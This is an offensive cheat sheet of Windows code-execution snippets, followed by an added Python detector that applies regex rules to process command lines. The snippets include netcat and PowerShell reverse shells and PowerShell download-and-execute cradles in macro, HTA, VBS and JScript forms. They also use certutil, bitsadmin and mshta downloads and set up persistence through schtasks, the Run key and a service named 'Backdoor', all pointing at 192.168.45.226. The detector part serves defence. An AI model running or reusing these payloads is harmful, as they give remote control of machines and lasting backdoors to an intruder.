Code Execution - Windows Snippets

Netcat - Reverse Shell

nc.exe -nv 192.168.45.226 9001 -e cmd.exe
Requires netcat (nc.exe) to be present on the target system.

PowerShell - Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient('192.168.45.226',9001);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
  $sendback = (iex $data 2>&1 | Out-String );
  $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  $stream.Write($sendbyte,0,$sendbyte.Length);
  $stream.Flush()
};
$client.Close()
Runs a reverse shell from PowerShell without needing nc.exe.

Cmd.exe - Reverse Shell

cmd.exe /c "echo open 192.168.45.226 9001 > ftp.txt && echo user anonymous >> ftp.txt && echo binary >> ftp.txt && echo get reverse_shell.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt"
Uses the built-in ftp client with a script file (-s:) to fetch a file from an FTP server; the downloaded reverse_shell.exe still has to be launched separately.

VBScript - Reverse Shell

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(WScript.Arguments.Item(1),True) >> wget.vbs
echo ts.Write http.responseText >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://192.168.45.226/shell.exe shell.exe
Uses VBScript (run with cscript) to download a payload over HTTP; the script only writes the file, it does not run it.

WMI - Command Execution

wmic process call create "cmd.exe /c calc.exe"
Executes a command on Windows through WMI.

Windows Management Instrumentation (WMI) - Reverse Shell

wmic /node:192.168.45.226 /user:Administrator process call create "powershell -ExecutionPolicy Bypass -NoP -NonI -W Hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.226/revshell.ps1')"
Executes a remote payload through WMI on the host given by /node.

Windows Task Scheduler - Persistence

schtasks /create /sc minute /mo 1 /tn "UpdateService" /tr "C:\Users\Public\shell.exe" /ru SYSTEM
Creates a scheduled task that runs the shell every minute as SYSTEM.

Windows Registry - Persistence via CMD

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Users\Public\shell.exe" /f
Adds a malicious program to the current user's Run key so it executes at logon.

Microsoft Office VBA Macro - Reverse Shell

Sub AutoOpen()
    Dim s As Object
    Set s = CreateObject("WScript.Shell")
    s.Run "cmd /c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.226/revshell.ps1')"
End Sub
Placed in a Word/Excel macro (AutoOpen) to run remote code through PowerShell.

Windows Script Host (WSH) - Reverse Shell

echo Set o = CreateObject("WScript.Shell") > revshell.vbs
echo o.Run "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.226/revshell.ps1')", 0, True >> revshell.vbs
wscript revshell.vbs
Creates and runs a VBScript that downloads and executes a remote payload.

HTA (HTML Application) - Execution

<html>
<body>
<script>
var o = new ActiveXObject("WScript.Shell");
o.run("powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.226/revshell.ps1')");
</script>
</body>
</html>
Can be saved as .hta and opened (by mshta) for automatic execution of the malicious code.

JavaScript (JScript) - Reverse Shell

var o = new ActiveXObject("WScript.Shell");
o.run("powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.226/revshell.ps1')");
Runs PowerShell through the WScript.Shell ActiveX object, as JScript under Windows Script Host or in Internet Explorer where ActiveX is permitted.

Windows BitsAdmin - Download & Execute

bitsadmin /transfer myjob http://192.168.45.226/shell.exe C:\Users\Public\shell.exe
start C:\Users\Public\shell.exe
Uses bitsadmin to download a shell and then starts it.

Windows CertUtil - Download & Execute

certutil -urlcache -split -f "http://192.168.45.226/shell.exe" C:\Users\Public\shell.exe
start C:\Users\Public\shell.exe
Downloads a remote file with certutil and then executes it.

Mshta - Remote Code Execution

mshta "http://192.168.45.226/payload.hta"
Executes a remote HTA payload via mshta.

Windows Service - Persistence

sc create backdoor binPath= "C:\Users\Public\shell.exe" start= auto
Creates a Windows service, set to start automatically, whose binary is the shell.

Windows Rundll32 - Code Execution

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('Hello from Rundll32');"
Executes JavaScript in the Windows context via rundll32 (through mshtml's RunHTMLApplication).
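Added example (not from the original page or any project it references): a small Python detector that applies the patterns from every snippet above (netcat -e, ftp -s:, wmic process call create, hidden PowerShell download cradles, schtasks/reg/sc persistence pointing at C:\Users\Public, bitsadmin /transfer, certutil -urlcache, mshta with a URL, rundll32 javascript:) to process-creation command lines. The log format is constructed for this example (one Image=... CommandLine=... line per event, loosely modelled on Sysmon Event ID 1), the sample log lines are constructed, and the rule names and the C:\Users\Public path anchor are assumptions to tune to the local environment.

```python
"""Detection helper written as an added example for this page (not part of the
original snippets). It flags process-creation command lines that match the
living-off-the-land and persistence patterns catalogued on the page.

The log format is a constructed, simplified 'Image=... CommandLine=...' line
per event, loosely modelled on Sysmon Event ID 1; adapt parse_line() to what
your sensor actually emits."""
import re
from collections import Counter

# One rule per technique on the page, matched case-insensitively against the
# full command line. The persistence rules key on a user-writable path
# (C:\Users\Public here, an assumption) rather than on the bare tool name,
# because schtasks/reg/sc are used legitimately all day long.
RULES = [
    ("netcat_exec",          r"\bnc(\.exe)?\s.*\s-e\s+cmd(\.exe)?\b"),
    ("ftp_script_file",      r"\bftp(\.exe)?\s.*-s:"),
    ("wmic_process_create",  r"\bwmic(\.exe)?\s.*\bprocess\s+call\s+create\b"),
    ("powershell_hidden_download",
        r"powershell.*(-w(indowstyle)?\s+hidden|-nop\b|-noninteractive).*"
        r"(downloadstring|\biex\b|invoke-expression)"),
    ("schtasks_public_path", r"\bschtasks(\.exe)?\s+/create\b.*c:\\users\\public\\"),
    ("runkey_persistence",   r"\breg(\.exe)?\s+add\b.*\\currentversion\\run\b"),
    ("service_public_path",  r'\bsc(\.exe)?\s+create\b.*binpath=\s*"?c:\\users\\public\\'),
    ("bitsadmin_transfer",   r"\bbitsadmin(\.exe)?\s+/transfer\b.*https?://"),
    ("certutil_download",    r"\bcertutil(\.exe)?\s.*-urlcache\b.*https?://"),
    ("mshta_remote",         r'\bmshta(\.exe)?\s+"?https?://'),
    ("rundll32_javascript",  r"\brundll32(\.exe)?\s+javascript:"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]

# Constructed log line format (assumption): "Image=<path> CommandLine=<cmdline>"
LINE_RE = re.compile(r"^Image=(?P<image>\S+)\s+CommandLine=(?P<cmd>.*)$")


def parse_line(line):
    """Return {'image', 'cmd'} for one log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return {"image": m.group("image"), "cmd": m.group("cmd")}


def classify(cmd):
    """Names of every rule whose pattern occurs in the command line."""
    return [name for name, rx in COMPILED if rx.search(cmd)]


def scan(lines):
    """Return (image, cmd, matched_rules) for each parseable line with a hit."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        rules = classify(rec["cmd"])
        if rules:
            hits.append((rec["image"], rec["cmd"], rules))
    return hits


def summarize(lines):
    """Count hits per rule name over a batch of log lines."""
    return Counter(name for _, _, rules in scan(lines) for name in rules)


# Constructed sample events: the page's commands plus three benign lines
# (certutil -verify, notepad, a plain PowerShell command) that must not fire.
SAMPLE_LOG = r"""Image=C:\Windows\System32\certutil.exe CommandLine=certutil -urlcache -split -f "http://192.168.45.226/shell.exe" C:\Users\Public\shell.exe
Image=C:\Windows\System32\certutil.exe CommandLine=certutil -verify C:\certs\server.cer
Image=C:\Windows\System32\bitsadmin.exe CommandLine=bitsadmin /transfer myjob http://192.168.45.226/shell.exe C:\Users\Public\shell.exe
Image=C:\Windows\System32\mshta.exe CommandLine=mshta "http://192.168.45.226/payload.hta"
Image=C:\Windows\System32\rundll32.exe CommandLine=rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('x');"
Image=C:\Windows\System32\wbem\WMIC.exe CommandLine=wmic process call create "cmd.exe /c calc.exe"
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.45.226/revshell.ps1')
Image=C:\Windows\System32\schtasks.exe CommandLine=schtasks /create /sc minute /mo 1 /tn "UpdateService" /tr "C:\Users\Public\shell.exe" /ru SYSTEM
Image=C:\Windows\System32\reg.exe CommandLine=reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Users\Public\shell.exe" /f
Image=C:\Windows\System32\sc.exe CommandLine=sc create backdoor binPath= "C:\Users\Public\shell.exe" start= auto
Image=C:\Windows\System32\notepad.exe CommandLine="C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt
Image=C:\Tools\nc.exe CommandLine=nc.exe -nv 192.168.45.226 9001 -e cmd.exe
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -Command Get-Process
Image=C:\Windows\System32\ftp.exe CommandLine=ftp -s:ftp.txt
"""

if __name__ == "__main__":
    for image, cmd, rules in scan(SAMPLE_LOG.splitlines()):
        print(f"{', '.join(rules):28s} {image}\n    {cmd}")
    print(dict(summarize(SAMPLE_LOG.splitlines())))
```

The patterns deliberately require the combination that makes a command suspicious (certutil with -urlcache and a URL, PowerShell with a hidden window or -nop plus a download cradle, a persistence tool pointing at a user-writable path) rather than the tool name alone, which keeps routine certutil -verify or plain PowerShell use out of the alert stream. On the constructed sample, 11 of the 14 events fire, each on exactly one rule.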